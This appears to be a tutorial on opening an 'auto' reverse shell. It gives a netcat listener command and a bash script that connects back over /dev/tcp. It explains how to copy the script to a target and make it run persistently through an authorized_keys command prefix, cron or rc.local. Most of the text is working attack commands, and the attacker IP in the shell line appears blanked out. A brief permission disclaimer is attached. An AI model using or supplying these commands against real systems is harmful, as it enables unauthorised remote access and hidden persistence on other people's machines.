Auto Reverse Shell

TL;DR

This guide shows you how to automatically open a reverse bash shell when a target machine connects to your listening server. This is useful for penetration testing or remote access, but use it responsibly and only on systems you have permission to test.

Setting up the Listener

1. Choose a Port: Pick a port number above 1024 that isn’t already in use. For this example, we’ll use port 4444.
2. Start Netcat (nc): On your attacking machine, start listening for connections using netcat:

   nc -lvnp 4444

   This command does the following:

   • -l: Listen for incoming connections.
   • -v: Verbose output (shows connection information).
   • -n: Use numeric IP addresses instead of resolving hostnames.
   • -p 4444: Listen on port 4444.

Creating the Auto Reverse Shell Script

1. Create a Bash Script: On your attacking machine, create a new file (e.g., reverse_shell.sh) with the following content:

   #!/bin/bash
   bash -i >& /dev/tcp//4444 0>&1

   Replace with your attacking machine’s IP address. This script does the following:

   • #!/bin/bash: Shebang line, specifies the interpreter for the script.
   • bash -i: Starts an interactive bash shell.
   • >& /dev/tcp//4444 0>&1: Redirects standard input and output to a TCP connection on your attacking machine’s IP address and port 4444.
2. Make the Script Executable: Give the script execute permissions:

   chmod +x reverse_shell.sh

Transferring and Executing the Script on the Target

1. Transfer the Script: Get the reverse_shell.sh script onto the target machine. You can use methods like:
   • scp reverse_shell.sh user@target_ip:/tmp/ (if SSH is available)
   • Using a web server to host the file and downloading it with wget or curl on the target.
   • Other file transfer methods depending on your situation.
2. Execute the Script: On the target machine, execute the script:

   ./reverse_shell.sh

Automatic Execution (Optional)

To automatically open a reverse shell on connection, you need to find a way to execute the script when the target connects. This depends heavily on the target system and your access level.

1. SSH Key Authentication: If SSH is enabled, add an authorized key that executes the script upon login. Edit ~/.ssh/authorized_keys on the target machine and prepend a command to execute the script:

   command="./reverse_shell.sh" ssh-rsa ... your_public_key ...

2. Cron Job: If you have cron access, schedule the script to run periodically (not ideal for immediate reverse shell on connection).
3. Startup Script: Add the script execution command to a startup script (e.g., /etc/rc.local) if appropriate and allowed.

Important Considerations

• Firewalls: Ensure that firewalls on both your attacking machine and the target machine allow traffic on the chosen port (4444 in this example).
• IP Address Changes: If your attacking machine’s IP address changes, you’ll need to update the script on the target. Consider using a dynamic DNS service.
• Security Risks: Reverse shells are powerful tools that can be misused. Use them responsibly and only with explicit permission.
• cyber security:** Be aware of the legal implications of unauthorized access.